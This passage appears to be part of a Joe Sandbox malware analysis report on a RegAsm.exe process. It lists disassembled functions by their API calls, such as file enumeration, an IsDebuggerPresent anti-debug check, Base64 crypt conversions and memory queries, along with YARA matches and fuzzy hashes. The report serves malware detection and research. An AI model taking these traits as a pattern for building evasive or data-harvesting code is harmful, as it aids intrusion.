                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004268E3,?,?,00000010), ref: 0040A8D3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426AF8), ref: 0040A94C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426AFC), ref: 0040A966
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$FileFindFirstlstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: #$\*.*
                                                                                                                                                                                                                                                    • API String ID: 1618123633-1611066409
                                                                                                                                                                                                                                                    • Opcode ID: bd7bf350bf4179cefc24822a0a60d337b430f62ba54a91a245994edc4de49f3d
                                                                                                                                                                                                                                                    • Instruction ID: c38e94397e3ba1990063f33c68e0238268edbad59724b286dc8d7488d84fa9f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd7bf350bf4179cefc24822a0a60d337b430f62ba54a91a245994edc4de49f3d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9126E75811249EACB15EBE1C955AEEBB78AF24304F1040BEE506335D2DB782B4CCBB5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C739E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                    • String ID: -Infinity$NaN
                                                                                                                                                                                                                                                    • API String ID: 3839614884-2141177498
                                                                                                                                                                                                                                                    • Opcode ID: e3ade900bcd0d80b635997e5c356a1e05b336bf25109614667736bae33d551a6
                                                                                                                                                                                                                                                    • Instruction ID: 34ff7cc77c0f6820c1460f4be1708961f4ce3f80197dfa31c08ae735ec359f91
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3ade900bcd0d80b635997e5c356a1e05b336bf25109614667736bae33d551a6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C1DF31E043298BDF14CFE8C98179EB7B6FB88314F145529D409ABB82DB70AD49CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0041B7E7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0041E59A
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041E5AF
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041E5BA
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041E5D6
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0041E5DD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                    • String ID: 8d
                                                                                                                                                                                                                                                    • API String ID: 2579439406-1695097073
                                                                                                                                                                                                                                                    • Opcode ID: 5a348dee17856cd1bdd19526643b12c4345e1a0c42f545946512098af2c1739a
                                                                                                                                                                                                                                                    • Instruction ID: d7de1529d9bc7fb149cbb07c4dafd6a628ffb69d75914720c2b6a8ed3740400c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a348dee17856cd1bdd19526643b12c4345e1a0c42f545946512098af2c1739a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A21F6BC610324DFE750DF25EC896447BB2FB0A309F50202AEA0883761E7765A81CF1D
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C74545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C748A4B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                    • String ID: ~qml
                                                                                                                                                                                                                                                    • API String ID: 2221118986-1807757901
                                                                                                                                                                                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                    • Instruction ID: 68228e57f0a1e0d2f9e392c28f3bb37220ce13b8d36b62f40d43e93c5891229f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B10772E0021ACFDB14CF68CD807A9B7B6EF95314F1942B9C549DB786D730A989CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C74542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7488F0
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C74925C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                    • String ID: ~qml
                                                                                                                                                                                                                                                    • API String ID: 2221118986-1807757901
                                                                                                                                                                                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                    • Instruction ID: bf85b171ef066aecda5c24a6efc9e8441eeb5d54971b4a887464cae51c0b5013
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34B1E572E4010ACFDB14CF58CD806ADB7B6EF94314F198279C959DB785D730A989CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7450C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C748E18
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C74925C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                    • String ID: ~qml
                                                                                                                                                                                                                                                    • API String ID: 2221118986-1807757901
                                                                                                                                                                                                                                                    • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                                                    • Instruction ID: 04fd8855bb3e2e869274f9867c789ea0f36b549b0ecd55fcb9474a5a5a40a022
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06A10872E0011ACFCB14CF68CD807A9B7B6EF94314F1582B9C949DB745D730A989CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C73B92D), ref: 6C6E9BC8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E9B80: __Init_thread_footer.LIBCMT ref: 6C6E9BDB
                                                                                                                                                                                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6E03D4,?), ref: 6C73B955
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73B9A5
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73BA20
                                                                                                                                                                                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C73BA7B
                                                                                                                                                                                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C73BA81
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C73BA86
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1753913139-0
                                                                                                                                                                                                                                                    • Opcode ID: eae7d61d5f74b3640a87197741c8c4ce47335b9ff17fc57f0fd21fb95f122c80
                                                                                                                                                                                                                                                    • Instruction ID: 828501dd26c57f015b82d18ebc93d1112f48a0b3d498816ff79a8707fb5c71c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eae7d61d5f74b3640a87197741c8c4ce47335b9ff17fc57f0fd21fb95f122c80
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16517C71E01A2DDFDF14CEA8CA84ADDBBB6BF88314F145129E905B7601DB30BD458B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7277A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C727A81
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C727A93
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C727AA1
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: __aulldiv.LIBCMT ref: 6C6F5DB4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F5DED
                                                                                                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C727B31
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4054851604-0
                                                                                                                                                                                                                                                    • Opcode ID: e1fd05e28d3369e6c326de08176c128ac6d52a2484d149e8e8f016c3b9dcfad7
                                                                                                                                                                                                                                                    • Instruction ID: 2d81e90bce0113b10df84d724250e8b306fae7373eeac5399bad9fa343d28234
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1fd05e28d3369e6c326de08176c128ac6d52a2484d149e8e8f016c3b9dcfad7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2B1AF357083808BCB14CF25C65465FB7E2BFC9318F154A2CE995A7791DB74E90ACB82
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004115E0 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411604
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411613
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041161A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1871034439-0
                                                                                                                                                                                                                                                    • Opcode ID: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                    • Instruction ID: 595f2c6b6719244211eb639eaa3ba493da93b7b53b7c726cee41136c71f30a03
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F112171600219ABDB10CFA9ED85EEBB7ADFF4A351F10555AFE09D7200D772DC508AA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00406E30 Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E57
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E66
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E7D
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E8C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4291131564-0
                                                                                                                                                                                                                                                    • Opcode ID: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
                                                                                                                                                                                                                                                    • Instruction ID: 7ab1ffad65c7dba4725e6c1c771468f6b7f0824a729bdc84492a242d2b069b1f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601DA76340322ABF7204F95EC45F57B7ADEF45B61F200426FB49EA2C0D6B5A8108BB4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410150 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,004271C4,00000000,?,00000000,00000000), ref: 0041015E
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,004271C4,00000000,?,00000000,00000000), ref: 00410165
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(004271C4,?,004271C4,00000000,?,00000000,00000000), ref: 00410171
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041019D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1243822799-0
                                                                                                                                                                                                                                                    • Opcode ID: 8f2ff721cb424942451b347fe5570341ae3898732b1430379c704d4f1e29be0c
                                                                                                                                                                                                                                                    • Instruction ID: fccc40c8ee202386385d4aa97dc71e834c2259e96c23f56b48720401643fd0a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f2ff721cb424942451b347fe5570341ae3898732b1430379c704d4f1e29be0c
